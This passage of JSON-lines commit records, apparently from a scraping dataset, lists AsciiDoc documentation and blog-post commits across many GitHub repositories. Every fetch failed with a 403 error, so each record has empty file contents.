data.\n","repos":"jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2bc7b1ccb82aff7fada3f324a4daf84a0b73e49","subject":"Update 2012-11-09-google-cloud-endpoints.adoc","message":"Update 2012-11-09-google-cloud-endpoints.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"474b90c1ed3a5830727eb5ba37678b281e591324","subject":"Camel-main-maven-plugin: Improve NOTE section","message":"Camel-main-maven-plugin: Improve NOTE section\n","repos":"apache\/camel,pax95\/camel,adessaigne\/camel,pmoerenhout\/camel,ullgren\/camel,ullgren\/camel,apache\/camel,christophd\/camel,pax95\/camel,nikhilvibhav\/camel,adessaigne\/camel,nikhilvibhav\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,nicolaferraro\/camel,pax95\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nicolaferraro\/camel,pmoerenhout\/camel,mcollovati\/camel,cunningt\/camel,cunningt\/camel,nicolaferraro\/camel,CodeSmell\/camel,cunningt\/camel,tdiesler\/camel,alvinkwekel\/camel,DariusX\/camel,DariusX\/camel,cunningt\/camel,pax95\/camel,apache\/camel,zregvart\/camel,gnodet\/camel,ullgren\/camel,tdiesler\/camel,zregvart\/camel,pax95\/camel,tadayosi\/camel,alvinkwekel\/camel,alvinkwekel\/camel,adessaigne\/camel,mcollovati\/camel,apache\/camel,gnodet\/camel,cunningt\/camel,mcollovati\/camel,adessaigne\/camel,nikhilvibhav\/camel,pax95\/camel,cunningt\/camel,gnodet\/camel,tadayosi\/camel,adessaigne\/camel,zregvart\/camel,mcollovati\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,pmoerenhout\/camel,CodeSmell\/camel,christophd\/camel,CodeSmell\/camel,tdiesler\/camel,gnodet\/camel,alvinkwekel\/camel,apache\/camel,tdiesler\/camel,zregvart\/camel,DariusX\/camel,nikhilvibhav\/camel,christophd\/camel,apache\/camel,nicolaferraro\/camel,pmoerenhout\/camel,DariusX\/camel,tadayosi\/camel,gnodet\/camel,CodeSmell\/camel,tadayosi\/camel,ullgren\/camel","old_file":"catalog\/camel-main-maven-plugin\/src\/main\/docs\/camel-main-maven-plugin.adoc","new_file":"catalog\/camel-main-maven-plugin\/src\/main\/docs\/camel-main-maven-plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"28f41408d81afd6d2ff7e37af1923816dcf1b57c","subject":"Update 2017-05-31-TWCTF-2017.adoc","message":"Update 2017-05-31-TWCTF-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8137e70c30d45f38e4dad392114a919494999a3","subject":"Small changes to documentation.","message":"Small changes to documentation.\n","repos":"pidydx\/artifacts,sebastianwelsh\/artifacts,keithtyler\/artifacts,crankyoldgit\/artifacts,destijl\/artifacts,vonnopsled\/artifacts,destijl\/artifacts,pidydx\/artifacts,vonnopsled\/artifacts,keithtyler\/artifacts,sebastianwelsh\/artifacts,crankyoldgit\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crankyoldgit\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec63cdd5782df40ec710b91a8918337b83b6c650","subject":"Update 2015-03-20-dictcc-direct-search.adoc","message":"Update 
2015-03-20-dictcc-direct-search.adoc","repos":"woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io","old_file":"_posts\/2015-03-20-dictcc-direct-search.adoc","new_file":"_posts\/2015-03-20-dictcc-direct-search.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/woehrl01\/woehrl01.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49c591cb66bf8f225f5010360c91b5b864e30ffa","subject":"Update 2018-04-20-deploy-by-kubernetes.adoc","message":"Update 2018-04-20-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-20-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-20-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"688b032997c2eaa22fc3bc905a5fd515b879de6d","subject":"y2b create post You've Never Seen A Mouse Do This...","message":"y2b create post You've Never Seen A Mouse Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-13-Youve-Never-Seen-A-Mouse-Do-This.adoc","new_file":"_posts\/2017-12-13-Youve-Never-Seen-A-Mouse-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06d580551749101cd0cddee08828ec500ed03593","subject":"Delete 2018-02-05-.adoc","message":"Delete 2018-02-05-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-.adoc","new_file":"_posts\/2018-02-05-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"902dbc1988e6b450071eae1b0f12acb1cbe86d56","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eb3f1294a897d2985bd45291cbc24f92a25f1e2","subject":"common snippet: add functionalTests intro","message":"common snippet: add functionalTests 
intro\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-functionalTestsIntro.adoc","new_file":"src\/main\/docs\/common-functionalTestsIntro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bef6c7fee405e87eaab44229879d7e4f335b96d","subject":"Update regexp-syntax.asciidoc (#20973)","message":"Update regexp-syntax.asciidoc (#20973)\n\n","repos":"rlugojr\/elasticsearch,fernandozhu\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,JervyShi\/elasticsearch,fernandozhu\/elasticsearch,spiegela\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,jprante\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,nezirus\/elasticsearch,MaineC\/elasticsearch,nilabhsagar\/elasticsearch,yanjunh\/elasticsearch,Helen-Zhao\/elasticsearch,vroyer\/elassandra,Stacey-Gammon\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,fforbeck\/elasticsearch,wuranbo\/elasticsearch,bawse\/elasticsearch,alexshadow007\/elasticsearch,JervyShi\/elasticsearch,spiegela\/elasticsearch,C-Bish\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,artnowo\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,Shepard1212\/elasticsearch,robin13\/elasticsearch,nilabhsagar\/elasticsearch,mortonsykes\/elasticsearch,wuranbo\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,Helen-Zhao\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,kalimatas\/elasticsearch,robin13\/elasticsearch,henakamaMSFT\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,glefloch\/elasticsearch,fforbeck\/elasticsearch,bawse\/elasticsearch,JervyShi\/elasticsearch,rlugojr\/elasticsearch,yanjunh\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,gmarz\/elasticsearch,mjason3\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,glefloch\/elasticsearch,robin13\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,Helen-Zhao\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,njlawton\/elasticsearch,winstonewert\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,i-am-Nathan\/elasticsearch,wangtuo\/elasticsearch,nkniz
e\/elasticsearch,nazarewk\/elasticsearch,bawse\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,a2lin\/elasticsearch,fforbeck\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,jprante\/elasticsearch,scottsom\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,MaineC\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,HonzaKral\/elasticsearch,bawse\/elasticsearch,naveenhooda2000\/elasticsearch,nazarewk\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,gmarz\/elasticsearch,scottsom\/elasticsearch,Shepard1212\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,njlawton\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,sneivandt\/elasticsearch,i-am-Nathan\/elasticsearch,henakamaMSFT\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,mjason3\/elasticsearch,mikemccand\/elasticsearch,gmarz\/elasticsearch,mortonsykes\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,artnowo\/elasticsearch,fernandozhu\/elasticsearch,fred84\/elasticsearch,henakamaMSFT\/elasticsearch,brandonkearby\/elasticsearch,rlugojr\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,scottsom\/elasticsearch,mikemccand\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,LeoYao\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra,gmarz\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,gmarz\/elasticsearch,yanjunh\/elasticsearch,C-Bish\/elasticsearch,vroyer\/elasticassandra,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,LewayneNaidoo\/elasticsearch,scorpionvicky\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,spiegela\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,JervyShi\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,liweinan0423\/elasticsearch,elasticdog\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,jprante\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,C-Bish\/elasticsearch,maddin2016\/elasticsearch,winstonewert\/elasticsearch,henakamaMSFT\/elasticsearch,LeoYao\/elastics
earch,i-am-Nathan\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,StefanGor\/elasticsearch,coding0011\/elasticsearch,yanjunh\/elasticsearch,mikemccand\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JervyShi\/elasticsearch,vroyer\/elasticassandra,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,jprante\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,elasticdog\/elasticsearch,i-am-Nathan\/elasticsearch,JervyShi\/elasticsearch,umeshdangat\/elasticsearch,liweinan0423\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,mohit\/elasticsearch,artnowo\/elasticsearch,JSCooke\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,mortonsykes\/elasticsearch,wangtuo\/elasticsearch,liweinan0423\/elasticsearch,MisterAndersen\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,obourgain\/elasticsearch,IanvsPoplicola\/elasticsearch,a2lin\/elasticsearch,maddin2016\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,geidies\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,masaruh\/elasticsearch,obourgain\/elasticsearch,wuranbo\/elasticsearch,brandonkearby\/elasticsearch,StefanGor\/elasticsearch,LeoYao\/elasticsearch,a2lin\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,sneivandt\/elasticsearch,fernandozhu\/elasticsearch,wenpos\/elasticsearch,liweinan0423\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,MaineC\/elasticsearch,JackyMai\/elasticsearch,rlugojr\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,wenpos\/elasticsearch,liweinan0423\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ZTE-PaaS\/elasticsearch,Shepard1212\/elasticsearch,jimczi\/elasticsearch,JSCooke\/elasticsearch,LewayneNaidoo\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,artnowo\/elasticsearch,mohit\/elasticsearch,a2lin\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,MisterAndersen\/elasticsearch","old_file":"docs\/reference\/query-dsl\/regexp-syntax.asciidoc","new_file":"docs\/reference\/query-dsl\/regexp-syntax.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1a862dc5218c1da90ab911f713bd94178e3cede","subject":"Update 2016-04-07-Banner-grabbing.adoc","message":"Update 
2016-04-07-Banner-grabbing.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3125c0666f0086795cff670183bb04f11bb4797","subject":"Update 2016-04-11-Inyeccion-S-S-I.adoc","message":"Update 2016-04-11-Inyeccion-S-S-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Inyeccion-S-S-I.adoc","new_file":"_posts\/2016-04-11-Inyeccion-S-S-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b939055e984270873ed4d581d07b50a84deb8e20","subject":"Update 2015-03-24-Episode-16-Drunken-Farmer.adoc","message":"Update 2015-03-24-Episode-16-Drunken-Farmer.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-03-24-Episode-16-Drunken-Farmer.adoc","new_file":"_posts\/2015-03-24-Episode-16-Drunken-Farmer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59b9ec818b4bde97a7610e493aa7d2d1b996ea39","subject":"Update 2015-10-22-On-your-marks-Get-set-Die.adoc","message":"Update 2015-10-22-On-your-marks-Get-set-Die.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-22-On-your-marks-Get-set-Die.adoc","new_file":"_posts\/2015-10-22-On-your-marks-Get-set-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"206c298a919c84f87f3b6893bc109e7d0f3b1e85","subject":"created stub architecture doc and added notes about what happens when JMS is down","message":"created stub architecture doc and added notes about what happens when JMS is down\n","repos":"rashidaligee\/kylo,Teradata\/kylo,Teradata\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,Teradata\/kylo","old_file":"docs\/latest\/architecture.adoc","new_file":"docs\/latest\/architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/claudiu-stanciu\/kylo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"820da66d9d8c5695661e7a889f4e21e490086c39","subject":"y2b create post Unboxing Cool Survival Gear","message":"y2b create post Unboxing Cool Survival 
Gear","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-28-Unboxing-Cool-Survival-Gear.adoc","new_file":"_posts\/2015-07-28-Unboxing-Cool-Survival-Gear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"219b6d10c4034ae82b560c22594e2e1f0e139be4","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"302ccd6290b4ef0477279ba1b605ed0a8c6fdccb","subject":"Renamed '_posts\/2018-01-09-Build-Blog-With-Hub-Press.adoc' to '_posts\/2018-01-09-Build-Blog-With-Hubpress.adoc'","message":"Renamed '_posts\/2018-01-09-Build-Blog-With-Hub-Press.adoc' to '_posts\/2018-01-09-Build-Blog-With-Hubpress.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Build-Blog-With-Hubpress.adoc","new_file":"_posts\/2018-01-09-Build-Blog-With-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17e135d5fcb4857b9e02824e333cd458af83bb8d","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3dc96bf5759be2e7a3110f37931d35e25e5f2cb","subject":"Update 2017-06-20-DL-meet-with-Neuroscience-3.adoc","message":"Update 2017-06-20-DL-meet-with-Neuroscience-3.adoc","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-06-20-DL-meet-with-Neuroscience-3.adoc","new_file":"_posts\/2017-06-20-DL-meet-with-Neuroscience-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1e800eadeff69d0800b0b856a11153e57e10dbe","subject":"Publish 2016-7-8.adoc","message":"Publish 
2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-8.adoc","new_file":"2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"797c2ffb701a1a0524072310105b3a6921078006","subject":"Publish 2016-7-8.adoc","message":"Publish 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-8.adoc","new_file":"2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc580690741acca27112b728ea23bcac87c50081","subject":"Fix typo in 0.8 release notes","message":"Fix typo in 0.8 release notes\n\nChange-Id: I1650870b087e4999aee9a5f8eb6828035084cb52\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2700\nReviewed-by: Jean-Daniel Cryans\nTested-by: Kudu 